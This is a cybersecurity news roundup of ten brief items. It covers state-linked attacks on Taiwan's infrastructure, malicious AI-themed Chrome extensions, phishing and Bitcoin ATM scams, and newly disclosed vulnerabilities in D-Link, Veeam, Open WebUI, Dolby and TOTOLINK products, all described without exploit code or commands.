Cyber threats escalated sharply in 2025, with state-linked actors, malicious software, and financial scams exploiting vulnerabilities across critical infrastructure, personal devices, and digital payment systems. Chinese state-linked hackers averaged 2.63 million daily attacks on Taiwan’s critical infrastructure, targeting energy, healthcare, and communications via ransomware and unpatched systems, led by BlackTech and APT41. Over 900,000 users were hit by malicious Chrome extensions impersonating AITOPIA AI, stealing ChatGPT and DeepSeek data, while Bitcoin ATM scams cost Americans $333 million, with older adults disproportionately targeted through fake government calls, tech support, and family emergency scams. Continue reading for more cybersecurity updates.
01
Chinese state-linked hackers are targeting Taiwan’s critical infrastructure with 2.63 million daily attacks in 2025 (up 6% YoY), hitting energy, healthcare, and communications via ransomware and unpatched systems, led by groups like BlackTech and APT41.
02
Malicious Chrome extensions impersonating the AITOPIA AI sidebar have compromised over 900,000 users by exfiltrating ChatGPT and DeepSeek conversations to attacker-controlled servers every 30 minutes.
03
The Black Cat hacker group has been using fake Notepad++ websites to distribute malware and steal data through social engineering and SEO manipulation.
04
Phishing actors are abusing email routing misconfigurations to spoof internal domains and deliver convincing phishing emails, leveraging PhaaS platforms like Tycoon2FA for credential theft, financial fraud, and AiTM attacks.
05
The FBI reports at least $333 million in losses from Bitcoin ATM scams in 2025, with older adults disproportionately targeted through fake government calls, tech support scams, and family emergency ruses.
06
Hackers are actively exploiting a critical RCE vulnerability (CVE-2026-0625) in legacy D-Link DSL routers, abusing improper input sanitization in the dnscfg.cgi endpoint to execute arbitrary shell commands without authentication.
07
Veeam disclosed four high-impact vulnerabilities in Backup & Replication v13 that could enable RCE or root-level access, including CVE-2025-55125 (RCE as root), CVE-2025-59470 (RCE as PostgreSQL user), CVE-2025-59469 (arbitrary file write as root), and CVE-2025-59468 (RCE via password parameters).
08
A high-severity vulnerability (CVE-2025-64496) in Open WebUI versions 0.6.34 and older allows potential account takeovers and server compromises when the Direct Connections feature is enabled.
09
Dolby patched a critical zero-click RCE vulnerability (CVE-2025-54957) in the Dolby Digital Plus Unified Decoder, with Google addressing it for Pixel devices in December 2025 and rolling it out across all Android devices in January 2026.
10
A vulnerability in the TOTOLINK EX200 extender's firmware-upload error-handling can unintentionally enable an unauthenticated root-level telnet service, allowing full system access to a remote authenticated attacker.
